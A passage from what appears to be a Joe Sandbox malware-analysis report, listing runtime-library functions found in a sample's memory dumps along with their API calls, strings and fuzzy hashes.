Instruction Fuzzy Hash: 8101F272F516008FDF21CF20C804BAA33E5EB8A206F1540B8DD0A97285E370A8818B80

Function 0043A232 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: e407e9efc2c23f9dc95612776b80d1b5d5b0102f0e55751205d6e64252a273d2
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 20E08C32951228EBCB14DB89C90498AF3FCFB8CB44F11019BB501D3200C279DE00CBD8

Function 0214A499 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 54bcf3498e2374782ae0613e547dcb23b52ffb31cb5c51161f28424d8e88b68b
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: B4E08632995128EFCB14DB98C50494EF3ECEB44B04B5A0456B909D3510C770DF00CBD0

Function 0041EFC8 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041F25B

Strings

pEvents, xrefs: 0041F253

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pEvents
API String ID: 2141394445-2498624650
Opcode ID: 163b5ff406515e44ac50a8b7493924e67a044ffe29e720de80f55e4d6a5877e1
Instruction ID: 73ca6f78ff20a94c9699f5ac8579f8ff040d863983f96f876882e01b490d566b
Opcode Fuzzy Hash: 163b5ff406515e44ac50a8b7493924e67a044ffe29e720de80f55e4d6a5877e1
Instruction Fuzzy Hash: FC819135E00219DFCF14DFE5C981BEEB7B1AF45314F14446AE801A7242DB39AD8ACB59

Function 0042447E Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 004244D8

Part of subcall function 004242B9: InitializeSListHead.KERNEL32(?,?,00000000,?,?), ref: 00424385
Part of subcall function 004242B9: InitializeSListHead.KERNEL32(?), ref: 0042438F

ListArray.LIBCONCRT ref: 0042450C
Hash.LIBCMT ref: 00424575
Hash.LIBCMT ref: 00424585
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 0042461A
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00424627
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00424634
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00424641

Part of subcall function 00429BE1: std::bad_exception::bad_exception.LIBCMT ref: 00429C03

RegisterWaitForSingleObject.KERNEL32(?,00000000,004279B5,?,000000FF,00000000), ref: 004246C9
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004246EB
GetLastError.KERNEL32(0042542B,?,?,00000000,?,?), ref: 004246FD
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0042471A

Part of subcall function 0041FB4A: CreateTimerQueueTimer.KERNEL32(?,00000001,0000000A,?,?,+TB,00000008,?,0042471F,?,00000000,004279A6,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0041FB62

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00424744

Strings

rKB, xrefs: 00424497

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID: rKB
API String ID: 2750799244-594269022
Opcode ID: 0cc5cee6ee34294b39c4034cc4bcb95c5defaf9be2f3115d682d146fe8f5ffc0
Instruction ID: 5860af37039b9e32742a4f63b67b9b20205c57ec04f8fa57200bc9ff335ac920
Opcode Fuzzy Hash: 0cc5cee6ee34294b39c4034cc4bcb95c5defaf9be2f3115d682d146fe8f5ffc0
Instruction Fuzzy Hash: 76816FB0A11B22ABD708DF75D845BD9FBA8BF49704F50021FF42897281CBB8A564CBD5

Function 0214F4F6 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0214F53A

Part of subcall function 0214F0D3: _free.LIBCMT ref: 0214F0F0
Part of subcall function 0214F0D3: _free.LIBCMT ref: 0214F102
Part of subcall function 0214F0D3: _free.LIBCMT ref: 0214F114
Part of subcall function 0214F0D3: _free.LIBCMT ref: 0214F126
Part of subcall function 0214F0D3: _free.LIBCMT ref: 0214F138
Part of subcall function 0214F0D3: _free.LIBCMT ref: 0214F14A
Part of subcall function 0214F0D3: _free.LIBCMT ref: 0214F15C
Part of subcall function 0214F0D3: _free.LIBCMT ref: 0214F16E
Part of subcall function 0214F0D3: _free.LIBCMT ref: 0214F180
Part of subcall function 0214F0D3: _free.LIBCMT ref: 0214F192
Part of subcall function 0214F0D3: _free.LIBCMT ref: 0214F1A4
Part of subcall function 0214F0D3: _free.LIBCMT ref: 0214F1B6
Part of subcall function 0214F0D3: _free.LIBCMT ref: 0214F1C8

_free.LIBCMT ref: 0214F52F

Part of subcall function 0214AF8C: HeapFree.KERNEL32(00000000,00000000,?,0214F264,?,00000000,?,?,?,0214F28B,?,00000007,?,?,0214F68D,?), ref: 0214AFA2
Part of subcall function 0214AF8C: GetLastError.KERNEL32(?,?,0214F264,?,00000000,?,?,?,0214F28B,?,00000007,?,?,0214F68D,?,?), ref: 0214AFB4

_free.LIBCMT ref: 0214F551
_free.LIBCMT ref: 0214F566
_free.LIBCMT ref: 0214F571
_free.LIBCMT ref: 0214F593
_free.LIBCMT ref: 0214F5A6
_free.LIBCMT ref: 0214F5B4
_free.LIBCMT ref: 0214F5BF
_free.LIBCMT ref: 0214F5F7
_free.LIBCMT ref: 0214F5FE
_free.LIBCMT ref: 0214F61B
_free.LIBCMT ref: 0214F633

Strings

8"F, xrefs: 0214F5E2
`'F, xrefs: 0214F50C

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: 8"F$`'F
API String ID: 161543041-3117062166
Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction ID: 645dd4390d07f284308d7f5b436102fb985c83bf2d8ab970a66fd4eb19c80897
Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction Fuzzy Hash: F7315EB26847019FEB31AE78D844B5A77EAEF00314F214629E05DDB6A0EF34E946CB10

Function 0212F22F Relevance: 24.2, APIs: 16, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0212F236
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0212F4C2

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: H_prolog3std::invalid_argument::invalid_argument
String ID:
API String ID: 1590901807-0
Opcode ID: 163b5ff406515e44ac50a8b7493924e67a044ffe29e720de80f55e4d6a5877e1
Instruction ID: 91a3e3b7b8c78bea57f57ba8ee95e599ad97a2eff4474b6ce930aa3ce63f43f1
Opcode Fuzzy Hash: 163b5ff406515e44ac50a8b7493924e67a044ffe29e720de80f55e4d6a5877e1
Instruction Fuzzy Hash: F081C131D802689FCF24DFA8C980BEEB7B5FF45314F144419E411AB681DB74A96ACF90

Function 0041CFCB Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00465720,00000FA0,?,?,0041CFA7), ref: 0041CFD7
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0041CFA7), ref: 0041CFE2
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041CFA7), ref: 0041CFF3
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041D005
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041D013
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0041CFA7), ref: 0041D036
___scrt_fastfail.LIBCMT ref: 0041D047
DeleteCriticalSection.KERNEL32(00465720,00000007,?,?,0041CFA7), ref: 0041D052
CloseHandle.KERNEL32(00000000,?,?,0041CFA7), ref: 0041D062

Strings

SleepConditionVariableCS, xrefs: 0041CFFF
WakeAllConditionVariable, xrefs: 0041D00B
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0041CFDD
kernel32.dll, xrefs: 0041CFEE

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: 194657d56f4d7fd81a93c1d073690bc7bf73ac7f8de16171310682bd9f2809b8
Instruction ID: 11ff2769104fbb0d1e4467a111c773c69e4b4285fcc60793a1bb7c298cfdb733
Opcode Fuzzy Hash: 194657d56f4d7fd81a93c1d073690bc7bf73ac7f8de16171310682bd9f2809b8
Instruction Fuzzy Hash: DB01B575A40B11EBD7212B71BC0CF9B3E98DB44B53F140036FC01D23A2EAB9C8418A6E

Function 0043266E Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00432680

Part of subcall function 0043247E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004324A1

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004326A1
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004326AE
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004326FC
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00432783
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00432796
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 004327E3

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 92c16f799a48bc497ddfc13ccace3655e51c18cad8e929827737632f692e731c
Instruction ID: ee37e89b1d530146b8b96656d37106c69ba8b693bc18f40608ecd934774e8980
Opcode Fuzzy Hash: 92c16f799a48bc497ddfc13ccace3655e51c18cad8e929827737632f692e731c
Instruction Fuzzy Hash: 8681C230900209ABDF169F54DA81BFF7B72BF59308F04509AEC402B362C7BA8D15DB69

Function 021428D5 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 021428E7

Part of subcall function 021426E5: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 02142708

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 02142908
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 02142915
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 02142963
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 021429EA
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 021429FD
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 02142A4A

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 92c16f799a48bc497ddfc13ccace3655e51c18cad8e929827737632f692e731c
Instruction ID: 49595d79bcf9c50ee509b85e7095fce79666f0f0dbcaa4d68f5abdad4cb57fce
Opcode Fuzzy Hash: 92c16f799a48bc497ddfc13ccace3655e51c18cad8e929827737632f692e731c
Instruction Fuzzy Hash: 4B81A13094025AAFDF26DF64C950BFE7FB2AF45308F040099FC496B291CB768996DB61

Function 021346E5 Relevance: 22.7, APIs: 15, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 021346EC
ListArray.LIBCONCRT ref: 0213473F

Part of subcall function 02134520: RtlInitializeSListHead.NTDLL(?), ref: 021345EC
Part of subcall function 02134520: RtlInitializeSListHead.NTDLL(?), ref: 021345F6

ListArray.LIBCONCRT ref: 02134773
Hash.LIBCMT ref: 021347DC
Hash.LIBCMT ref: 021347EC
RtlInitializeSListHead.NTDLL(?), ref: 02134881
RtlInitializeSListHead.NTDLL(?), ref: 0213488E
RtlInitializeSListHead.NTDLL(?), ref: 0213489B
RtlInitializeSListHead.NTDLL(?), ref: 021348A8

Part of subcall function 02139E48: std::bad_exception::bad_exception.LIBCMT ref: 02139E6A

RegisterWaitForSingleObject.KERNEL32(?,00000000,004279B5,?,000000FF,00000000), ref: 02134930
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02134952
GetLastError.KERNEL32(02135692,?,?,00000000,?,?), ref: 02134964
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 02134981

Part of subcall function 0212FDB1: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,02135692,00000008,?,02134986,?,00000000,004279A6,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0212FDC9

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021349AB

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorH_prolog3LastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 1224710184-0
Opcode ID: 0cc5cee6ee34294b39c4034cc4bcb95c5defaf9be2f3115d682d146fe8f5ffc0
Instruction ID: 7e0694d1599747df773df74055473329f18125253eb197be02b2272c103079e2
Opcode Fuzzy Hash: 0cc5cee6ee34294b39c4034cc4bcb95c5defaf9be2f3115d682d146fe8f5ffc0
Instruction Fuzzy Hash: 4E816CB0A51B26AFD719DF74C884BD9FBA9BF09700F10021BE42897280CBB4A564CFD1

Function 004227D2 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 004227E1

Part of subcall function 00423ACC: GetVersionExW.KERNEL32(?), ref: 00423AF0
Part of subcall function 00423ACC: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 00423B8F

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 004227F5
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422816
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0042287F
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004228B3

Part of subcall function 0042078D: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 004207AD

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422933

Part of subcall function 004222FC: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00422310

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 0042297B

Part of subcall function 00420762: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0042077E

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 0042298F
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229A0
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004229ED
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422A12
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00422A1E

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
Instruction ID: ce882e14882d44da4d34594b85a71d8b73c613c218c8cfe4f97325181c9db837
Opcode Fuzzy Hash: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
Instruction Fuzzy Hash: 2681B471B00526ABCB18DFA9EA9066EB7F1BB48304F94413FD441A7740E7F8A981CB49

Function 02132A39 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 02132A48

Part of subcall function 02133D33: GetVersionExW.KERNEL32(?), ref: 02133D57
Part of subcall function 02133D33: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 02133DF6

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 02132A5C
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 02132A7D
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02132AE6
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02132B1A

Part of subcall function 021309F4: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 02130A14

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 02132B9A

Part of subcall function 02132563: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 02132577

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02132BE2

Part of subcall function 021309C9: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 021309E5

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02132BF6
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02132C07
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02132C54
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 02132C79
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 02132C85

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
Instruction ID: 9cd7d6f4066e02a94136999b1401fcbc1cf0552b922ed4cf9133940df7940ce0
Opcode Fuzzy Hash: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
Instruction Fuzzy Hash: 5381B271A8051A8FCF2AEFA8D8E06ADB7F7FB48304B64413DC846A7644E770AD41CB55

Function 0043F28F Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043F2D3

Part of subcall function 0043EE6C: _free.LIBCMT ref: 0043EE89
Part of subcall function 0043EE6C: _free.LIBCMT ref: 0043EE9B
Part of subcall function 0043EE6C: _free.LIBCMT ref: 0043EEAD
Part of subcall function 0043EE6C: _free.LIBCMT ref: 0043EEBF
Part of subcall function 0043EE6C: _free.LIBCMT ref: 0043EED1
Part of subcall function 0043EE6C: _free.LIBCMT ref: 0043EEE3
Part of subcall function 0043EE6C: _free.LIBCMT ref: 0043EEF5
Part of subcall function 0043EE6C: _free.LIBCMT ref: 0043EF07
Part of subcall function 0043EE6C: _free.LIBCMT ref: 0043EF19
Part of subcall function 0043EE6C: _free.LIBCMT ref: 0043EF2B
Part of subcall function 0043EE6C: _free.LIBCMT ref: 0043EF3D
Part of subcall function 0043EE6C: _free.LIBCMT ref: 0043EF4F
Part of subcall function 0043EE6C: _free.LIBCMT ref: 0043EF61

_free.LIBCMT ref: 0043F2C8

Part of subcall function 0043AD25: HeapFree.KERNEL32(00000000,00000000,?,0043EFFD,?,00000000,?,?,?,0043F024,?,00000007,?,?,0043F426,?), ref: 0043AD3B
Part of subcall function 0043AD25: GetLastError.KERNEL32(?,?,0043EFFD,?,00000000,?,?,?,0043F024,?,00000007,?,?,0043F426,?,?), ref: 0043AD4D

_free.LIBCMT ref: 0043F2EA
_free.LIBCMT ref: 0043F2FF
_free.LIBCMT ref: 0043F30A
_free.LIBCMT ref: 0043F32C
_free.LIBCMT ref: 0043F33F
_free.LIBCMT ref: 0043F34D
_free.LIBCMT ref: 0043F358
_free.LIBCMT ref: 0043F390
_free.LIBCMT ref: 0043F397
_free.LIBCMT ref: 0043F3B4
_free.LIBCMT ref: 0043F3CC

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction ID: 22701e66ed756db875f58b0555caca5b47699be08f3bf9d99b7657a32e4de815
Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction Fuzzy Hash: B7317E31A00605DFEB206A3AD845F5B73E9EF08319F10642FE895D7691DB7CAC54CB29

Function 0041FA11 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00423B86), ref: 0041FA1F
GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 0041FA2D
GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 0041FA3B
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 0041FA69
GetLastError.KERNEL32(?,?,?,00423B86), ref: 0041FA84
GetLastError.KERNEL32(?,?,?,00423B86), ref: 0041FA90
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FAA6

Strings

GetThreadGroupAffinity, xrefs: 0041FA33
SetThreadGroupAffinity, xrefs: 0041FA27
kernel32.dll, xrefs: 0041FA1A
GetCurrentProcessorNumberEx, xrefs: 0041FA5E

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 1654681794-465693683
Opcode ID: 3ae5e1761c5e68bf1df0cae86709e1bcb1c39423b3646c192bb872ab5e16c95f
Instruction ID: b80a01b8a4c4e678093761d7ca7b359fc155a9a5cbb4eee0c7fbfd439a91bdd3
Opcode Fuzzy Hash: 3ae5e1761c5e68bf1df0cae86709e1bcb1c39423b3646c192bb872ab5e16c95f
Instruction Fuzzy Hash: 2601DB365443116BD7107BB67C4AFEB37ACAD04796724043BF906D1293EABCD449476C

Function 00435245 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00435340
type_info::operator==.LIBVCRUNTIME ref: 00435367
___TypeMatch.LIBVCRUNTIME ref: 00435473
CatchIt.LIBVCRUNTIME ref: 004354C8
IsInExceptionSpec.LIBVCRUNTIME ref: 0043554E
_UnwindNestedFrames.LIBCMT ref: 004355D5
CallUnexpected.LIBVCRUNTIME ref: 004355F0

Strings

csm, xrefs: 0043539E
csm, xrefs: 00435280
csm, xrefs: 004352ED

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: 8e3e93dc056ab8fd5de83e8c65849bf1026f44a4fd8d946d8d6c1e4fea1a4fc4
Instruction ID: 87d9d292caa908f141bfa3f2fe0936e9291a99cb80def58f1b9f5a31d2ccf9b4
Opcode Fuzzy Hash: 8e3e93dc056ab8fd5de83e8c65849bf1026f44a4fd8d946d8d6c1e4fea1a4fc4
Instruction Fuzzy Hash: 78C19A71800609EFCF18DFA5C8819AEBBB5BF1C315F14655BE8016B206D738EA51CF99

Function 021454AC Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 021455A7
